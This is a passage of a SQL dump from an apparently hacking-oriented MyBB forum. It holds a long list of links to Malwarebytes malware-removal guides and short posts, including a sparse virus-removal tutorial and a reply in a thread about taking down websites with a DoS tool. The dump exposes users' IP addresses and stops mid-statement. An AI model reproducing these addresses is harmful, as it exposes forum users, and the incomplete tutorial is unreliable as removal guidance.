instructions for Windows Troubles Analyzer[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=76453]Removal instructions for PcVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=66064]Removal instructions for System Tool[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=76239]Removal instructions for Windows Shield Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=76002]Removal instructions for SpecialGuard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=75600]Removal instructions for Windows Risks Eliminator[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=75505]Removal instructions for Safecare[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=75409]Removal instructions for Windows Utility Tool[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=75330]Removal instructions for Windows Optimal Solution[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=75264]Removal instructions for PrivacyHidden[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=74919]Removal instructions for SmartScan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=74722]Removal instructions for \"Nice picture\" Backdoor.Agent[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=74559]Removal instructions for HomeVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=74306]Removal instructions for Windows Health Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=74028]Removal instructions for MyPCcheck[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=73934]Removal instructions for WindowsDisk[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=73614]Removal instructions for Spyware Protection[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=73404]Removal instructions for LiveBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=73330]Removal instructions for MemoryOptimizer[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=72980]Removal instructions for Windows Optimization & Security[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=72830]Removal instructions for HDDLow[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=72749]Removal instructions for VaccineClean[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=72454]Removal instructions for SmartHDD[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=72243]Removal instructions for MyDisk[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=72151]Removal instructions for EasyVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=71848]Removal instructions for PCoptimizer[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=71683]Removal instructions for PrivacyRight[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=71641]Removal instructions for WiseVaccine[/url] [/list][/list] [list] [*][color=#00BFFF][b]2010 Self Help Guides[/b][/color] [list] [*][url=http://forums.malwarebytes.org/index.php?showtopic=71380]Removal instructions for WinDefrag[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=71203]Removal instructions for PrivacyGuard 2010[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=71158]Removal instructions for Vaccine2010[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70858]Removal instructions for NewVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70697]Removal instructions for HDDTools[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70632]Removal instructions for Ddosclean[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70478]Removal instructions for VaccineProgram[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70117]Removal instructions for SpyCare[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=70043]Removal instructions for WinHDD[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=69758]Removal instructions for PCclear[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=69655]Removal instructions for CleanV[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=69458]Removal instructions for UserVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=69047]Removal instructions for PowerCare[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68934]Removal instructions for ProtectOne[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68800]Removal instructions for UltraDefragger[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68733]Removal instructions for Qscan[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68408]Removal instructions for Security Inspector 2010[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=68258]Removal instructions for ScanZero[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67800]Removal instructions for SearchGuard[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67735]Removal instructions for Security Essentials 2011[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67633]Removal instructions for SafetyBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67529]Removal instructions for BestBoan[/url] [*][url=http://forums.malwarebytes.org/index.php?sshowtopic=67128]Removal instructions for DataProtect[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=66942]Removal instructions for AntiPrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=66870]Removal instructions for AdSafer[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=66617]Removal instructions for HDDDefragmenter[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=66396]Removal instructions for AntiProtect[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=66188]Removal instructions for CleanScan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=65779]Removal instructions for NewClean[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=65527]Removal instructions for IDboan[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=65308]Removal instructions for Scan119[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=64987]Removal instructions for InfoDoctor[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=64974]Removal instructions for VaccineKiller[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=64839]Removal instructions for InfoSecret[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=64533]Removal instructions for Smart Engine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=64337]Removal instructions for AntiVirus Studio 2010 [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=64192]Removal instructions for VaccineLab [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=63997]Removal instructions for RegistryClever [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=63818]Removal instructions for Malware Destructor 2011[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=63655]Removal instructions for VaccineData[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=63585]Removal instructions for SuperVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=63413]Removal instructions for InfoHold[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=63297]Removal instructions for InternetVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=63234]Removal instructions for SP Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=63005]Removal instructions for KeyCop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=62840]Removal instructions for KSecurity[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=62813]Removal instructions for Advanced Security Tool 2010[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=62612]Removal instructions for eClean[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=62507] Removal instructions for fake Microsoft Security Essentials alert[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=62221]Removal instructions for RealVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=62108]Removal instructions for Security119[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=61656]Removal instructions for Privacy Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=61583]Removal instructions for Privacy Info[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=61501]Removal instructions for MegaVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=61320]Removal instructions for WebVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=61147]Removal instructions for MedicCop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=60979]Removal instructions for DiskClean[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=60740]Removal instructions for AdCare[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=60624]Removal instructions for VaccineTree[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=60486]Removal instructions for My Security Shield[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=60231]Removal instructions for VirusCure[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=60118]Removal instructions for GreenVaccine[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=60035]Removal instructions for EzPrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=59850]Removal instructions for Wireshark Antivirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=59595]Removal instructions for MyInfoGuard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=59402]Removal instructions for PCPrivacy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=59163]Removal instructions for ResetInfo[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=58828]Removal instructions for Antivirus 2010[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=58630]Removal instructions for Net Protector AntiVirus 2010[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=58621]Removal instructions for Anticare[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=57988] Removal instructions for Antivir Solution Pro[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=57637]Removal instructions for PrivacyCare[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=57624]Removal instructions for CleanVirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=57462]Removal instructions for ByeClean[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=57011]Removal instructions for NeoProtect[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=56917] Removal instructions for Live Security Suite[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=56488] Removal instructions for DoctorV[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=56404] Removal instructions for Inprivacy[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=56368] Removal instructions for VDoctor[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=56294]Removal instructions for SafetyPC[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=56191]Removal instructions for ProtectInfo[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=55582] Removal instructions for Trojan Ransom.NoExe[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=55485] Removal instructions for XJR Antivirus[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=54634]Removal instructions for Defense Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=54519] Removal instructions for PC Sweeper[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=54133]Removal instructions for Hardclean[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=53835]Removal instructions for Spycheck Anti-Spyware 2010[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=53741] Removal instructions for AV Security Suite[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=53410] Removal instructions for Your PC Protector[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=52821]Removal instructions for Sysinternals Antivirus[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=52607] Removal instructions for Spyware Cleaner 2010[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=52352]Removal instructions for Win Antispyware Center[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=51908] Removal instructions for Security Master AV[/url][*] [url=http://forums.malwarebytes.org/index.php?showtopic=51634] Removal instructions for VaccineCenter[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=51123]Removal instructions for ByteDefender[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=50996] Removal instructions for WinGuard[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=50775] Removal instructions for ACommander[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=50485] Removal instructions for PrivacyGuard[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=50483] Removal instructions for Smart Security[/url][*] [url=http://forums.malwarebytes.org/index.php?showtopic=50481] Removal instructions for Anti Virus Armor[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=46994] Removal instructions for Digital Protection[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=49893] Removal instructions for A-Fast Antivirus[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=49882] Removal instructions for AKM Antivirus 2010 Pro[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=49527]Removal instructions for Antispyware Soft[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=49160] Removal instructions for My Security Engine[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=49053] Removal instructions for PCommander[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=48736] Removal instructions for VirusCatch[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=48537] Removal instructions for VirusBye[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=48193] Removal instructions for OneClean[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=48180] Removal instructions for FunnyMall[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=47641] Removal instructions for Spyware Cease[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=45798]Removal instructions for Security Central[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=45786] Removal instructions for Desktop Security 2010[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=45579] Removal instructions for Your Protection[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=45511]Removal instructions for Antivirus Suite[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44882] Removal instructions for Control Components[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44171] Removal instructions for Antimalware Doctor[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44156] Removal instructions for PC Bug Finder Pro[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44043] Removal instructions for Security Guard[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=44039] Removal instructions for User Protection[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=43987]Removal instructions for XP Internet Security[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=43142] Removal instructions for Antivirus7[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42945]Removal instructions for CleanUp Antivirus[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42915] Removal instructions for MyComGuard[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42451] Removal instructions for Volcano Security Suite[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42377]Removal instructions for Virus Protector[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=42074]Removal instructions for Dr. Guard[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=41803] Removal instructions for PrivacyControl[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40952]Removal instructions for PC Defender[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40935]Removal instructions for ErrorWiz[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40802]Removal instructions for General Antivirus[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40556]Removal instructions for Security essentials 2010[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40241]Removal instructions for Paladin Antivirus[/url] [*] [url=http://forums.malwarebytes.org/index.php?showtopic=40153]Removal instructions for My Security Wall[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=40021]Removal instructions for Security Antivirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=39969]Removal instructions for Advanced Defender[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=39814]Removal instructions for Control center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=39806]Removal instructions for Antivirus Plus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=39582]Removal instructions for AntiVir2010[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=39458]Removal instructions for GuardWWW[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=39312]Removal instructions for Antivirus Soft[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=38629]Removal instructions for XP Antispyware 2010[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=38352]Removal instructions for PcsSecure[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=38289]Removal instructions for Content Cleaner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=37834]Removal instructions for Live PC Care[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=37542]Removal instructions for APcSafe[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=37206]Removal instructions for Win Security 360[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=36703]Removal instructions for Personal Security[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=36599]Removal instructions for DefendAPC[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=36445]Removal instructions for Ghost Antivirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=36126]Removal instructions for AntiMalwarePro[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=35910]Removal instructions for InSysSecure[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=35836]Removal instructions for SysProtector[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=35407]Removal instructions for GreatDefender[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=35285]Removal instructions for Total PC Defender[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=35239]Removal instructions for Security Tool[/url] [/list][/list] [list][*][color=#00BFFF][b]2009 Self Help Guides[/b][/color] [list] [*][url=http://forums.malwarebytes.org/index.php?showtopic=34949]Removal instructions for Additional Guard[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=34889]Removal instructions for MalwareDefense[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=34664]Removal instructions for AntiMalware[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=34660]Removal instructions for APCProtect[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=34225]Removal instructions for Internet Security 2010[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=34126]Removal instructions for MalwareRemovalBot[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=34090]Removal instructions for TheDefend[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=33970]Removal instructions for Internet Antivirus Pro[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=16755]Removal instructions for WinBlueSoft[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=16740]Removal instructions for Unvirex[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=16522]Removal instructions for Advanced Virus Remover[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=14671]Removal instructions for AntiVirus360Remover[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=14628]Removal instructions for ErrorEasy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=14567]Removal instructions for Advanced Spyware Detect[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=14468]Removal instructions for MalwareCleaner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=14446]Removal instructions for ErrorFix[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=14444]Removal instructions for RegFix Pro[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=14443]Removal instructions for RegTool[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=14421]Removal instructions for Fix Tool[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=13964]Removal instructions for Virus Sweeper[/url] [/list] [*][color=#00BFFF][b]2008 Self Help Guides[/b][/color] [list] [*][url=http://forums.malwarebytes.org/index.php?showtopic=8412]Removal instructons for Antivirus 360[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4052]Removal instructions for Trojan.Zlob[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=7450]Removal instructions for VirusTrigger[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4064]Removal instructions for VideoAccessCodec[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=7314]Removal instructions for Spyware Guard 2008[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=7263]Removal instructions for WinDefender 2009[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=7262]Removal instructions for Personal Defender 2009[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=7123]Removal instructions for AntiVirus Sentry[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=6980]Removal instructions for Pro Antispyware 2009[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=6949]Removal instructions for Security 2009[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=6925]Removal instructions for SpyProtector[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=6881]Removal instructions for XLG Security Center[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=6703]Removal instructons for Antivirus 2010[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=6458]Removal instructions for AntiMalware 2009[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4556]Removal instructions for Spyware.Passwords[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=6305]Removal instructions for AntiVirus Lab 2009[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5786]Removal instructions for Antivir64[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5743]Removal instructions for WinProtector[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5742]Removal instructions for Internet Antivirus [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5398]Removal instructions for Trojan.DNSChanger[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5318]Removal instructions for The Web Sentinel[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5317]Removal instructions for The Registry Sentinel[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5252]Removal instructions for PC Clean Pro[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5251]Removal instructions for PC Antispy[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5178]Removal instructions for Antivirus 2009[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5177]Removal instructions for Doctor Antivirus 2008[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5176]Removal instructions for Real AntiSpyware[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5175]Removal instructions for WinAntispyware 2008[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5174]Removal instructions for SpywareScanner 2008[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5173]Removal instructions for PestSweeper[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5034]Removal instructions for Advanced Antivirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=5033]Removal instructions for Trojan.FakeAlert[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4925]Removal instructions for AntiSpyCheck[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4782]Removal instructions for MalwarePatrolPro[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4781]Removal instructions for PCPrivacyCleaner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4656]Removal instructions for AdvancedXPFixer[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4631]Removal instructions for Advanced XP Defender[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4630]Removal instructions for XP SecurityCenter[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4558]Removal instructions for Trojan.Agent[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4557]Removal instructions for Trojan.BHO[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4420]Removal instructions for IE AntiVirus[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4280]Removal instructions for Malware Bell[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=4013]Removal instructions for Files Secure[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3900]Removal instructions for PCAntiVirusPro[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3865]Removal instructions for RealAV[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3804]Removal instructions for Spy-Rid[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3803]Removal instructions for Easy Spyware Cleaner[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3802]Removal instructions for InfeStop[/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3787] Removal instructions for The LastDefender [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3786] Removal instructions for WinIFixer [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3766] Removal instructions for SpyWatchE [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3759] Removal instructions for SpySnipe [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3757] Removal instructions for OnlineGuard [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3652] Removal instructions for Antispyboss [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3651] Removal instructions for MalwareAlarm [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3620] Removal instructions for WinXDefender [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3619] Removal instructions for AdwareRemover 2007 [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3569] Removal instructions for SpyBurner [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3567] Removal instructions for SystemDefender [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3566] Removal instructions for SysCleaner [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3565] Removal instructions for WinReanimator [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3562] Removal instructions for WinFix Master [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3561] Removal instructions for Deus Cleaner 2008 [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3510] Removal instructions for XpAntivirus [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3505] Removal instructions for Immunizr [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3504] Removal instructions for WinSpyKiller [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3501] Removal instructions for AntiSpyKit [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3500] Removal instructions for MalwareCore [/url] [*][url=http://forums.malwarebytes.org/index.php?showtopic=3493]Removal instructions for VirusHeat[/url] [/list][/list] Credits: Koala', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '46444985fefe80dae9b59bec4fa0ad54', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1657', '301', '1404', '25', 'RE: Is keyscrambler good?', '0', '9', 'p420', '1346971772', 'Keyscrambler is the best browser addon on the internet.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '8c343fba49ce230d62e612ee5b6aa1da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1658', '355', '0', '25', '[TUT]Remove Win32:Sality virus and any other AV-blocking viruses', '0', '9', 'p420', '1346971856', 'I\'m infected recently with the win32:sality virus, and i successfully removed it. Here is my method: [list] 1. Download a free antivirus([url=http://www.avast.com/free-antivirus-download]Click here if you don\'t have one[/url]) 2. Install it. If you can\'t install, follow the steps in the spoiler. [spoiler] First, try killing all auto-start apps like msmsgs.exe. If you still can\'t install your AV, follow these steps: [/spoiler] 3. Run a virus scan. 4. Delete all infected files. 5. Now reboot your PC. 6. If your antivirus running after restart, you sucessfully removed the virus. Don\'t forget to say thanks if i helped you! Enjoy your virus-free computer', '72.229.164.105', '1223009385', '0', '0', '9', '1346971981', '1', '493c21e58572279675231fcfdb52b30b', '0', '1346971981'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1659', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '9', 'p420', '1346972016', 'Unique sounds to be a group of HQ members would like to be in it.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '3fd41a0764ef766c948f81655951710e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1660', '352', '1652', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '61', 'NXK', '1346972166', 'Seems legit. Please add a virus scan for your DoS tool.', '99.253.65.17', '1677541649', '0', 